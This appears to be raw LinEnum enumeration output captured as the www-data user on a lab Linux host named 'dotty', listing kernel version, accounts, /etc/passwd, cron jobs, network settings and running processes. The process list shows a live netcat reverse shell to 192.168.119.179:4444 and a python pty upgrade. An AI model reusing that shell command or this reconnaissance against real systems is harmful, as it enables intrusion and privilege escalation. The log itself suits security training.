
[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Sat Apr 10 08:36:14 EDT 2021
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux dotty 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018


[00;31m[-] Specific release information:[00m
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
NAME="Ubuntu"
VERSION="16.04.4 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.4 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[00;31m[-] Hostname:[00m
dotty


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[00;31m[-] Users that have previously logged onto the system:[00m
Username         Port     From             Latest
root             tty1                      Mon Jan 27 12:39:06 -0500 2020
dorothy          tty1                      Tue Dec 31 04:25:43 -0500 2019


[00;31m[-] Who else is logged on:[00m
 08:36:16 up 18:43,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(dorothy) gid=1000(dorothy) groups=1000(dorothy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=111(mysql) gid=117(mysql) groups=117(mysql)
uid=112(telnetd) gid=119(telnetd) groups=119(telnetd),43(utmp)
uid=113(ftp) gid=120(ftp) groups=120(ftp)


[00;31m[-] It looks like we have some admin users:[00m
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(dorothy) gid=1000(dorothy) groups=1000(dorothy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)


[00;31m[-] Contents of /etc/passwd:[00m
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
dorothy:x:1000:1000:dorothy,,,:/home/dorothy:/bin/bash
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
telnetd:x:112:119::/nonexistent:/bin/false
ftp:x:113:120:ftp daemon,,,:/srv/ftp:/bin/false


[00;31m[-] Super user account(s):[00m
root


[00;31m[-] Accounts that have recently used sudo:[00m
/home/dorothy/.sudo_as_admin_successful


[00;31m[-] Are permissions on /home directories lax:[00m
total 12K
drwxr-xr-x  3 root    root    4.0K Dec 31  2019 .
drwxr-xr-x 23 root    root    4.0K Dec 31  2019 ..
drwxr-xr-x  3 dorothy dorothy 4.0K Dec 31  2019 dorothy


[00;31m[-] Root is allowed to login via SSH:[00m
PermitRootLogin yes


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
TERM=xterm
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/tmp
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=3
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root  4096 Dec 31  2019 /bin
drwxr-xr-x 2 root root 12288 Dec 31  2019 /sbin
drwxr-xr-x 2 root root 20480 Dec 31  2019 /usr/bin
drwxr-xr-x 2 root root  4096 Feb 28  2018 /usr/local/bin
drwxr-xr-x 2 root root  4096 Feb 28  2018 /usr/local/sbin
drwxr-xr-x 2 root root  4096 Dec 31  2019 /usr/sbin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK		022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  712 Dec 18  2019 php
-rw-r--r--  1 root root  190 Dec 31  2019 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root  539 Jun 11  2018 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Sep 26  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 26  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 12  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Dec 31  2019 .
drwxr-xr-x 95 root root 4096 Dec 31  2019 ..
-rw-r--r--  1 root root  102 Apr  5  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;31m[-] Systemd timers:[00m
NEXT                         LEFT           LAST                         PASSED       UNIT                         ACTIVATES
Sat 2021-04-10 08:39:00 EDT  2min 39s left  Sat 2021-04-10 08:09:08 EDT  27min ago    phpsessionclean.timer        phpsessionclean.service
Sat 2021-04-10 12:01:20 EDT  3h 25min left  Fri 2021-04-09 22:43:27 EDT  9h ago       apt-daily.timer              apt-daily.service
Sat 2021-04-10 14:07:43 EDT  5h 31min left  Fri 2021-04-09 14:07:43 EDT  18h ago      systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2021-04-11 06:00:04 EDT  21h left       Sat 2021-04-10 06:24:24 EDT  2h 11min ago apt-daily-upgrade.timer      apt-daily-upgrade.service
Mon 2021-04-12 04:39:54 EDT  1 day 20h left Fri 2021-04-09 19:46:24 EDT  12h ago      snapd.refresh.timer          snapd.refresh.service

5 timers listed.
[2mEnable thorough tests to see inactive timers[00m


[00;33m### NETWORKING  ##########################################[00m
[00;31m[-] Network and IP info:[00m
ens160    Link encap:Ethernet  HWaddr 00:50:56:bf:a0:51  
          inet addr:10.11.1.116  Bcast:10.11.255.255  Mask:255.255.0.0
          inet6 addr: fe80::250:56ff:febf:a051/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1765782 errors:0 dropped:442 overruns:0 frame:0
          TX packets:1693640 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:273657687 (273.6 MB)  TX bytes:792098261 (792.0 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:2536 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2536 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:246316 (246.3 KB)  TX bytes:246316 (246.3 KB)


[00;31m[-] ARP history:[00m
master.thinc.local (10.11.1.220) at 00:50:56:bf:50:bd [ether] on ens160
? (10.11.0.1) at 00:50:56:9f:dc:d5 [ether] on ens160


[00;31m[-] Nameserver(s):[00m
nameserver 10.11.1.220


[00;31m[-] Default route:[00m
default         10.11.0.1       0.0.0.0         UG    0      0        0 ens160


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::21                   :::*                    LISTEN      -               


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 185348  4124 ?        Ss   Apr09   0:12 /sbin/init
root         2  0.0  0.0      0     0 ?        S    Apr09   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Apr09   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    Apr09   0:02 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    Apr09   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    Apr09   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    Apr09   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    Apr09   0:00 [watchdog/1]
root        12  0.0  0.0      0     0 ?        S    Apr09   0:00 [migration/1]
root        13  0.0  0.0      0     0 ?        S    Apr09   0:02 [ksoftirqd/1]
root        15  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kworker/1:0H]
root        16  0.0  0.0      0     0 ?        S    Apr09   0:00 [kdevtmpfs]
root        17  0.0  0.0      0     0 ?        S<   Apr09   0:00 [netns]
root        18  0.0  0.0      0     0 ?        S<   Apr09   0:00 [perf]
root        19  0.0  0.0      0     0 ?        S    Apr09   0:00 [khungtaskd]
root        20  0.0  0.0      0     0 ?        S<   Apr09   0:00 [writeback]
root        21  0.0  0.0      0     0 ?        SN   Apr09   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   Apr09   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        S<   Apr09   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        26  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kblockd]
root        27  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ata_sff]
root        28  0.0  0.0      0     0 ?        S<   Apr09   0:00 [md]
root        29  0.0  0.0      0     0 ?        S<   Apr09   0:00 [devfreq_wq]
root        34  0.0  0.0      0     0 ?        S    Apr09   0:18 [kswapd0]
root        35  0.0  0.0      0     0 ?        S<   Apr09   0:00 [vmstat]
root        36  0.0  0.0      0     0 ?        S    Apr09   0:00 [fsnotify_mark]
root        37  0.0  0.0      0     0 ?        S    Apr09   0:00 [ecryptfs-kthrea]
root        53  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kthrotld]
root        54  0.0  0.0      0     0 ?        S<   Apr09   0:00 [acpi_thermal_pm]
root        55  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        57  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        58  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        59  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        60  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        61  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        62  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root        63  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_0]
root        64  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_0]
root        65  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_1]
root        66  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_1]
root        72  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ipv6_addrconf]
root        85  0.0  0.0      0     0 ?        S<   Apr09   0:00 [deferwq]
root        86  0.0  0.0      0     0 ?        S<   Apr09   0:00 [charger_manager]
root       145  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_2]
root       146  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_2]
root       147  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ttm_swap]
root       148  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_3]
root       149  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_3]
root       150  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_4]
root       151  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_4]
root       152  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_5]
root       153  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_5]
root       154  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_6]
root       155  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_6]
root       156  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_7]
root       157  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_7]
root       158  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_8]
root       159  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_8]
root       160  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_9]
root       161  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_9]
root       162  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_10]
root       163  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_10]
root       164  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_11]
root       165  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_11]
root       166  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_12]
root       167  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_12]
root       168  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_13]
root       169  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_13]
root       170  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_14]
root       171  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_14]
root       172  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_15]
root       173  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_15]
root       174  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_16]
root       175  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_16]
root       176  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_17]
root       177  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_17]
root       178  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_18]
root       179  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_18]
root       180  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_19]
root       181  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_19]
root       182  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_20]
root       183  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_20]
root       184  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_21]
root       185  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_21]
root       186  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_22]
root       187  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_22]
root       188  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_23]
root       189  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_23]
root       190  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_24]
root       191  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_24]
root       192  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_25]
root       193  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_25]
root       194  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_26]
root       195  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_26]
root       196  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_27]
root       197  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_27]
root       198  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_28]
root       199  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_28]
root       200  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_29]
root       201  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_29]
root       202  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_30]
root       203  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_30]
root       204  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_31]
root       205  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_31]
root       206  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kpsmoused]
root       211  0.0  0.0      0     0 ?        S<   Apr09   0:00 [mpt_poll_0]
root       218  0.0  0.0      0     0 ?        S<   Apr09   0:00 [mpt/0]
root       265  0.0  0.0      0     0 ?        S    Apr09   0:00 [scsi_eh_32]
root       266  0.0  0.0      0     0 ?        S<   Apr09   0:00 [scsi_tmf_32]
root       267  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root       269  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root       285  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kworker/1:1H]
root       289  0.0  0.0      0     0 ?        S<   Apr09   0:00 [kworker/0:1H]
root       353  0.0  0.0      0     0 ?        S<   Apr09   0:00 [raid5wq]
root       382  0.0  0.0      0     0 ?        S<   Apr09   0:00 [bioset]
root       406  0.0  0.0      0     0 ?        S    Apr09   0:02 [jbd2/sda1-8]
root       407  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ext4-rsv-conver]
root       465  0.0  0.2  28356  2032 ?        Ss   Apr09   0:00 /lib/systemd/systemd-journald
root       478  0.0  0.0      0     0 ?        S    Apr09   0:00 [kauditd]
root       493  0.0  0.0  94776   700 ?        Ss   Apr09   0:00 /sbin/lvmetad -f
root       494  0.0  0.0      0     0 ?        S<   Apr09   0:00 [iscsi_eh]
root       500  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ib_addr]
root       506  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ib_mcast]
root       507  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ib_nl_sa_wq]
root       508  0.0  0.0      0     0 ?        S<   Apr09   0:00 [ib_cm]
root       511  0.0  0.0      0     0 ?        S<   Apr09   0:00 [iw_cm_wq]
root       513  0.0  0.0      0     0 ?        S<   Apr09   0:00 [rdma_cm]
root       522  0.0  0.2  44696  2732 ?        Ss   Apr09   0:00 /lib/systemd/systemd-udevd
systemd+   601  0.0  0.1 100324  1916 ?        Ssl  Apr09   0:03 /lib/systemd/systemd-timesyncd
root       962  0.0  0.2 825404  2336 ?        Ssl  Apr09   0:59 /usr/bin/lxcfs /var/lib/lxcfs/
daemon     964  0.0  0.1  26048  1636 ?        Ss   Apr09   0:00 /usr/sbin/atd -f
root       966  0.0  0.1  20100  1712 ?        Ss   Apr09   0:01 /lib/systemd/systemd-logind
root       967  0.0  0.2 192264  2892 ?        Ssl  Apr09   0:45 /usr/bin/vmtoolsd
message+   968  0.0  0.1  42956  1576 ?        Ss   Apr09   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog     975  0.0  0.1 256392  1856 ?        Ssl  Apr09   0:01 /usr/sbin/rsyslogd -n
root       980  0.0  0.2  29012  2124 ?        Ss   Apr09   0:00 /usr/sbin/cron -f
root       982  0.0  0.2 275872  2292 ?        Ssl  Apr09   0:01 /usr/lib/accountsservice/accounts-daemon
root       984  0.0  0.7 223320  7300 ?        Ssl  Apr09   0:03 /usr/lib/snapd/snapd
root       986  0.0  0.1   4396  1204 ?        Ss   Apr09   0:00 /usr/sbin/acpid
root      1026  0.0  0.0  13372   132 ?        Ss   Apr09   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root      1028  0.0  0.3 277180  3140 ?        Ssl  Apr09   0:00 /usr/lib/policykit-1/polkitd --no-debug
root      1146  0.0  0.2  65512  2848 ?        Ss   Apr09   0:00 /usr/sbin/sshd -D
root      1174  0.0  0.1  24044  1624 ?        Ss   Apr09   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root      1177  0.0  0.0   5220    76 ?        Ss   Apr09   0:01 /sbin/iscsid
root      1178  0.0  0.3   5720  3508 ?        S<Ls Apr09   0:09 /sbin/iscsid
mysql     1181  0.0  5.7 1245760 58256 ?       Ssl  Apr09   0:27 /usr/sbin/mysqld
root      1250  0.0  0.1  15936  1316 tty1     Ss+  Apr09   0:00 /sbin/agetty --noclear tty1 linux
root      1265  0.0  0.1  19664  1780 ?        Ss   Apr09   0:11 /usr/sbin/irqbalance --pid=/var/run/irqbalance.pid
root      1290  0.0  0.1  15056  1828 ?        Ss   Apr09   0:00 /usr/sbin/xinetd -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
root      1296  0.0  0.8 268068  8752 ?        Ss   Apr09   0:13 /usr/sbin/apache2 -k start
www-data  1300  0.0  0.4 269140  4152 ?        S    Apr09   0:00 /usr/sbin/apache2 -k start
www-data  1750  0.0  0.0   4504   604 ?        S    Apr09   0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.179 4444 >/tmp/f
www-data  1753  0.0  0.0   4532   584 ?        S    Apr09   0:00 cat /tmp/f
www-data  1754  0.0  0.0   4504   516 ?        S    Apr09   0:00 /bin/sh -i
www-data  1755  0.0  0.1  11300  1628 ?        S    Apr09   0:00 nc 192.168.119.179 4444
www-data  1758  0.0  0.3  32116  3424 ?        S    Apr09   0:00 python -c import pty;pty.spawn("/bin/bash")
www-data  1759  0.0  0.2  18244  2300 pts/0    Ss+  Apr09   0:00 /bin/bash
root      5182  0.0  0.0      0     0 ?        S    03:39   0:00 [kworker/0:0]
root      5404  0.0  0.0      0     0 ?        S    05:09   0:00 [kworker/0:2]
www-data 16138  0.0  1.0 269272 10472 ?        S    06:37   0:01 /usr/sbin/apache2 -k start
www-data 16188  0.0  1.2 268756 13024 ?        S    06:37   0:01 /usr/sbin/apache2 -k start
www-data 16319  0.0  1.1 269156 12080 ?        S    06:46   0:01 /usr/sbin/apache2 -k start
www-data 16356  0.0  0.9 268876  9856 ?        S    07:06   0:01 /usr/sbin/apache2 -k start
www-data 16506  0.0  1.0 269272 10400 ?        S    07:19   0:00 /usr/sbin/apache2 -k start
www-data 16509  0.0  1.0 269132 10688 ?        S    07:21   0:00 /usr/sbin/apache2 -k start
www-data 16518  0.0  1.1 268624 11240 ?        S    07:26   0:00 /usr/sbin/apache2 -k start
root     16520  0.0  0.0      0     0 ?        S    07:26   0:00 [kworker/u4:1]
www-data 16524  0.0  1.1 268508 12040 ?        S    07:28   0:00 /usr/sbin/apache2 -k start
